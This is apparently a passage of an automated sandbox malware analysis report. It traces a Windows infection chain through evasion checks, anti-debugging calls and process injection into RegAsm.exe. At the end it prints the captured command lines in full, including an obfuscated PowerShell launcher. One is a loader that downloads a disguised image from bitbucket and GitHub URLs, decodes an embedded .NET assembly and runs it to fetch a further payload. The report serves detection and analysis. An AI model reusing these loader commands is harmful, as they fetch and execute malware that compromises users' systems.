                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040A6C0 Sleep,ExitProcess,13_2_0040A6C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,13_2_00412E96
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1600Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1496Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3901Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5871Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 731Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9251Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_13-41078
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5368Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6704Thread sleep count: 3901 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6404Thread sleep count: 5871 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6328Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2440Thread sleep count: 731 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2440Thread sleep time: -2193000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2440Thread sleep count: 9251 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2440Thread sleep time: -27753000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004081F9 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,13_2_004081F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004072E5 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_004072E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407733 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_00407733
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00414795 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,13_2_00414795
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00440A59 FindFirstFileExA,13_2_00440A59
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00404CF3 FindFirstFileW,FindNextFileW,13_2_00404CF3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00405C8E __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,13_2_00405C8E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407FDE FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,13_2_00407FDE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040511A SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,13_2_0040511A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFD4E8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFD4E8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFD3CC6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QEMU Virtual CPU
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFD4E8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFD4E8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFD3F02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFD3F02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFD4E8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFD4E8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFD4E8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFD4E8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFD4E8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFD4E8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFD3F02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFD4E8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
                  Source: RegAsm.exe, 0000000D.00000002.2557660938.0000000000CDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_13-41658
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004320EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_004320EC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00414EED LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,13_2_00414EED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00438983 mov eax, dword ptr fs:[00000030h]13_2_00438983
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040CB6C SetLastError,GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,13_2_0040CB6C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004320EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_004320EC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0042C576 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_0042C576
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0042C6C4 SetUnhandledExceptionFilter,13_2_0042C6C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0042C8EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_0042C8EC

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Yara matchFile source: amsi64_8.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4872, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8, type: MEMORYSTR
                  Source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, Program.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                  Source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, Program.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                  Source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, Program.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
                  Source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, Program.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
                  Source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, Program.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, payload, bufferSize, ref bytesRead)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44D000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 464000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46A000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46B000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46C000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 8E0008Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004124EF mouse_event,13_2_004124EF
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#CJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SmniiFI/niam/sdaeh/sfer/ann/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$codigo = 'wwbo#gu#d##u#fm#zqby#hy#aqbj#gu#u#bv#gk#bgb0#e0#yqbu#ge#zwbl#hi#xq#6#do#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b##g#d0#i#bb#e4#zqb0#c4#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b#bu#hk#c#bl#f0#og#6#fq#b#bz#de#mg#n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgb1#g4#ywb0#gk#bwbu#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i#b7#c##c#bh#hi#yqbt#c##k#bb#hm#d#by#gk#bgbn#fs#xqbd#cq#b#bp#g4#awbz#ck#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#b3#gu#ygbd#gw#aqbl#g4#d##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#c##pq#g#ec#zqb0#c0#ugbh#g4#z#bv#g0#i##t#ek#bgbw#hu#d#bp#gi#agbl#gm#d##g#cq#b#bp#g4#awbz#c##lqbd#g8#dqbu#hq#i##k#gw#aqbu#gs#cw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgbv#hi#zqbh#gm#a##g#cg#j#bs#gk#bgbr#c##aqbu#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#ck#i#b7#c##d#by#hk#i#b7#c##cgbl#hq#dqby#g4#i##k#hc#zqbi#em#b#bp#gu#bgb0#c4#r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#k##k#gw#aqbu#gs#kq#g#h0#i#bj#ge#d#bj#gg#i#b7#c##ywbv#g4#d#bp#g4#dqbl#c##fq#g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i#by#gu#d#b1#hi#bg#g#cq#bgb1#gw#b##g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gw#aqbu#gs#cw#g#d0#i#b##cg#jwbo#hq#d#bw#hm#og#v#c8#ygbp#hq#ygb1#gm#awbl#hq#lgbv#hi#zw#v#ge#z#bz#hm#zwbm#gq#cwbn#c8#d#bl#hm#d#bp#g4#zw#v#gq#bwb3#g4#b#bv#ge#z#bz#c8#aqbt#gc#xwb0#gu#cwb0#c4#agbw#gc#pw#x#dq#n##0#de#nw#n#cw#i##n#gg#d#b0#h##cw#6#c8#lwby#ge#dw#u#gc#aqb0#gg#dqbi#hu#cwbl#hi#ywbv#g4#d#bl#g4#d##u#gm#bwbt#c8#cwbh#g4#d#bv#g0#yqbs#g8#lwbh#hu#z#bp#hq#lwbt#ge#aqbu#c8#aqbt#gc#xwb0#gu#cwb0#c4#agbw#gc#pw#x#dq#n##0#de#nw#y#dm#jw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##j#bp#g0#yqbn#gu#qgb5#hq#zqbz#c##pq#g#eq#bwb3#g4#b#bv#ge#z#be#ge#d#bh#ey#cgbv#g0#t#bp#g4#awbz#c##j#bs#gk#bgbr#hm#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i#bp#gy#i##o#cq#aqbt#ge#zwbl#ei#eqb0#gu#cw#g#c0#bgbl#c##j#bu#hu#b#bs#ck#i#b7#c##j#bp#g0#yqbn#gu#v#bl#hg#d##g#d0#i#bb#fm#eqbz#hq#zqbt#c4#v#bl#hg#d##u#eu#bgbj#g8#z#bp#g4#zwbd#do#ogbv#fq#rg#4#c4#rwbl#hq#uwb0#hi#aqbu#gc#k##k#gk#bqbh#gc#zqbc#hk#d#bl#hm#kq#7##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##g#cq#cwb0#ge#cgb0#ey#b#bh#gc#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbt#fq#qqbs#fq#pg#+#cc#ow#g#cq#zqbu#gq#rgbs#ge#zw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#eu#tgbe#d4#pg#n#ds#i##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##9#c##j#bp#g0#yqbn#gu#v#bl#hg#d##u#ek#bgbk#gu#e#bp#gy#k##k#hm#d#bh#hi#d#bg#gw#yqbn#ck#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gu#bgbk#ek#bgbk#gu#e##g#d0#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c4#sqbu#gq#zqb4#e8#zg#o#cq#zqbu#gq#rgbs#ge#zw#p#ds#dq#k#c##i##g#c##i##g#c#